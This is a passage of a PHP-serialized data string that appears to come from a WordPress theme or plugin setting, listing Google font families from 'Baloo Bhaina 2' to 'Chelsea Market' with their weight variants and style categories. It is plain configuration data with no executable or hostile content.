2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Baloo Bhaina 2\";a:3:{s:5:\"label\";s:14:\"Baloo Bhaina 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Baloo Chettan 2\";a:3:{s:5:\"label\";s:15:\"Baloo Chettan 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Baloo Da 2\";a:3:{s:5:\"label\";s:10:\"Baloo Da 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Baloo Paaji 2\";a:3:{s:5:\"label\";s:13:\"Baloo Paaji 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Baloo Tamma 2\";a:3:{s:5:\"label\";s:13:\"Baloo Tamma 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Baloo Tammudu 2\";a:3:{s:5:\"label\";s:15:\"Baloo Tammudu 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Baloo Thambi 2\";a:3:{s:5:\"label\";s:14:\"Baloo Thambi 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Balsamiq Sans\";a:3:{s:5:\"label\";s:13:\"Balsamiq Sans\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Balthazar\";a:3:{s:5:\"label\";s:9:\"Balthazar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Bangers\";a:3:{s:5:\"label\";s:7:\"Bangers\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Barlow\";a:3:{s:5:\"label\";s:6:\"Barlow\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Barlow Condensed\";a:3:{s:5:\"label\";s:16:\"Barlow Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Barlow Semi Condensed\";a:3:{s:5:\"label\";s:21:\"Barlow Semi Condensed\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Barriecito\";a:3:{s:5:\"label\";s:10:\"Barriecito\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Barrio\";a:3:{s:5:\"label\";s:6:\"Barrio\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Basic\";a:3:{s:5:\"label\";s:5:\"Basic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Baskervville\";a:3:{s:5:\"label\";s:12:\"Baskervville\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Battambang\";a:3:{s:5:\"label\";s:10:\"Battambang\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"900\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Baumans\";a:3:{s:5:\"label\";s:7:\"Baumans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Bayon\";a:3:{s:5:\"label\";s:5:\"Bayon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Be Vietnam Pro\";a:3:{s:5:\"label\";s:14:\"Be Vietnam Pro\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Bebas Neue\";a:3:{s:5:\"label\";s:10:\"Bebas Neue\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Belgrano\";a:3:{s:5:\"label\";s:8:\"Belgrano\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Bellefair\";a:3:{s:5:\"label\";s:9:\"Bellefair\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Belleza\";a:3:{s:5:\"label\";s:7:\"Belleza\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Bellota\";a:3:{s:5:\"label\";s:7:\"Bellota\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Bellota Text\";a:3:{s:5:\"label\";s:12:\"Bellota Text\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"BenchNine\";a:3:{s:5:\"label\";s:9:\"BenchNine\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Benne\";a:3:{s:5:\"label\";s:5:\"Benne\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Bentham\";a:3:{s:5:\"label\";s:7:\"Bentham\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"Berkshire Swash\";a:3:{s:5:\"label\";s:15:\"Berkshire Swash\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Besley\";a:3:{s:5:\"label\";s:6:\"Besley\";s:8:\"variants\";a:12:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Beth Ellen\";a:3:{s:5:\"label\";s:10:\"Beth Ellen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Bevan\";a:3:{s:5:\"label\";s:5:\"Bevan\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:21:\"Big Shoulders Display\";a:3:{s:5:\"label\";s:21:\"Big Shoulders Display\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:28:\"Big Shoulders Inline Display\";a:3:{s:5:\"label\";s:28:\"Big Shoulders Inline Display\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:25:\"Big Shoulders Inline Text\";a:3:{s:5:\"label\";s:25:\"Big Shoulders Inline Text\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:29:\"Big Shoulders Stencil Display\";a:3:{s:5:\"label\";s:29:\"Big Shoulders Stencil Display\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:26:\"Big Shoulders Stencil Text\";a:3:{s:5:\"label\";s:26:\"Big Shoulders Stencil Text\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:18:\"Big Shoulders Text\";a:3:{s:5:\"label\";s:18:\"Big Shoulders Text\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Bigelow Rules\";a:3:{s:5:\"label\";s:13:\"Bigelow Rules\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Bigshot One\";a:3:{s:5:\"label\";s:11:\"Bigshot One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Bilbo\";a:3:{s:5:\"label\";s:5:\"Bilbo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:16:\"Bilbo Swash Caps\";a:3:{s:5:\"label\";s:16:\"Bilbo Swash Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"BioRhyme\";a:3:{s:5:\"label\";s:8:\"BioRhyme\";s:8:\"variants\";a:5:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"BioRhyme Expanded\";a:3:{s:5:\"label\";s:17:\"BioRhyme Expanded\";s:8:\"variants\";a:5:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Birthstone\";a:3:{s:5:\"label\";s:10:\"Birthstone\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:17:\"Birthstone Bounce\";a:3:{s:5:\"label\";s:17:\"Birthstone Bounce\";s:8:\"variants\";a:2:{i:0;s:3:\"500\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Biryani\";a:3:{s:5:\"label\";s:7:\"Biryani\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Bitter\";a:3:{s:5:\"label\";s:6:\"Bitter\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:23:\"Black And White Picture\";a:3:{s:5:\"label\";s:23:\"Black And White Picture\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Black Han Sans\";a:3:{s:5:\"label\";s:14:\"Black Han Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Black Ops One\";a:3:{s:5:\"label\";s:13:\"Black Ops One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Blinker\";a:3:{s:5:\"label\";s:7:\"Blinker\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Bodoni Moda\";a:3:{s:5:\"label\";s:11:\"Bodoni Moda\";s:8:\"variants\";a:12:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Bokor\";a:3:{s:5:\"label\";s:5:\"Bokor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Bona Nova\";a:3:{s:5:\"label\";s:9:\"Bona Nova\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Bonbon\";a:3:{s:5:\"label\";s:6:\"Bonbon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Bonheur Royale\";a:3:{s:5:\"label\";s:14:\"Bonheur Royale\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Boogaloo\";a:3:{s:5:\"label\";s:8:\"Boogaloo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Bowlby One\";a:3:{s:5:\"label\";s:10:\"Bowlby One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Bowlby One SC\";a:3:{s:5:\"label\";s:13:\"Bowlby One SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Brawler\";a:3:{s:5:\"label\";s:7:\"Brawler\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Bree Serif\";a:3:{s:5:\"label\";s:10:\"Bree Serif\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Brygada 1918\";a:3:{s:5:\"label\";s:12:\"Brygada 1918\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Bubblegum Sans\";a:3:{s:5:\"label\";s:14:\"Bubblegum Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Bubbler One\";a:3:{s:5:\"label\";s:11:\"Bubbler One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Buda\";a:3:{s:5:\"label\";s:4:\"Buda\";s:8:\"variants\";a:1:{i:0;s:3:\"300\";}s:8:\"category\";s:7:\"display\";}s:7:\"Buenard\";a:3:{s:5:\"label\";s:7:\"Buenard\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Bungee\";a:3:{s:5:\"label\";s:6:\"Bungee\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Bungee Hairline\";a:3:{s:5:\"label\";s:15:\"Bungee Hairline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Bungee Inline\";a:3:{s:5:\"label\";s:13:\"Bungee Inline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Bungee Outline\";a:3:{s:5:\"label\";s:14:\"Bungee Outline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Bungee Shade\";a:3:{s:5:\"label\";s:12:\"Bungee Shade\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Butcherman\";a:3:{s:5:\"label\";s:10:\"Butcherman\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Butterfly Kids\";a:3:{s:5:\"label\";s:14:\"Butterfly Kids\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Cabin\";a:3:{s:5:\"label\";s:5:\"Cabin\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Cabin Condensed\";a:3:{s:5:\"label\";s:15:\"Cabin Condensed\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Cabin Sketch\";a:3:{s:5:\"label\";s:12:\"Cabin Sketch\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Caesar Dressing\";a:3:{s:5:\"label\";s:15:\"Caesar Dressing\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Cagliostro\";a:3:{s:5:\"label\";s:10:\"Cagliostro\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Cairo\";a:3:{s:5:\"label\";s:5:\"Cairo\";s:8:\"variants\";a:8:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Caladea\";a:3:{s:5:\"label\";s:7:\"Caladea\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Calistoga\";a:3:{s:5:\"label\";s:9:\"Calistoga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Calligraffitti\";a:3:{s:5:\"label\";s:14:\"Calligraffitti\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Cambay\";a:3:{s:5:\"label\";s:6:\"Cambay\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Cambo\";a:3:{s:5:\"label\";s:5:\"Cambo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Candal\";a:3:{s:5:\"label\";s:6:\"Candal\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Cantarell\";a:3:{s:5:\"label\";s:9:\"Cantarell\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Cantata One\";a:3:{s:5:\"label\";s:11:\"Cantata One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Cantora One\";a:3:{s:5:\"label\";s:11:\"Cantora One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Capriola\";a:3:{s:5:\"label\";s:8:\"Capriola\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Caramel\";a:3:{s:5:\"label\";s:7:\"Caramel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Carattere\";a:3:{s:5:\"label\";s:9:\"Carattere\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Cardo\";a:3:{s:5:\"label\";s:5:\"Cardo\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Carme\";a:3:{s:5:\"label\";s:5:\"Carme\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Carrois Gothic\";a:3:{s:5:\"label\";s:14:\"Carrois Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Carrois Gothic SC\";a:3:{s:5:\"label\";s:17:\"Carrois Gothic SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Carter One\";a:3:{s:5:\"label\";s:10:\"Carter One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Castoro\";a:3:{s:5:\"label\";s:7:\"Castoro\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Catamaran\";a:3:{s:5:\"label\";s:9:\"Catamaran\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Caudex\";a:3:{s:5:\"label\";s:6:\"Caudex\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Caveat\";a:3:{s:5:\"label\";s:6:\"Caveat\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Caveat Brush\";a:3:{s:5:\"label\";s:12:\"Caveat Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:18:\"Cedarville Cursive\";a:3:{s:5:\"label\";s:18:\"Cedarville Cursive\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:11:\"Ceviche One\";a:3:{s:5:\"label\";s:11:\"Ceviche One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Chakra Petch\";a:3:{s:5:\"label\";s:12:\"Chakra Petch\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Changa\";a:3:{s:5:\"label\";s:6:\"Changa\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Changa One\";a:3:{s:5:\"label\";s:10:\"Changa One\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Chango\";a:3:{s:5:\"label\";s:6:\"Chango\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Charm\";a:3:{s:5:\"label\";s:5:\"Charm\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Charmonman\";a:3:{s:5:\"label\";s:10:\"Charmonman\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Chathura\";a:3:{s:5:\"label\";s:8:\"Chathura\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Chau Philomene One\";a:3:{s:5:\"label\";s:18:\"Chau Philomene One\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Chela One\";a:3:{s:5:\"label\";s:9:\"Chela One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Chelsea Market\";a:3:{s:5:\"label\";s:14:\"Chelsea 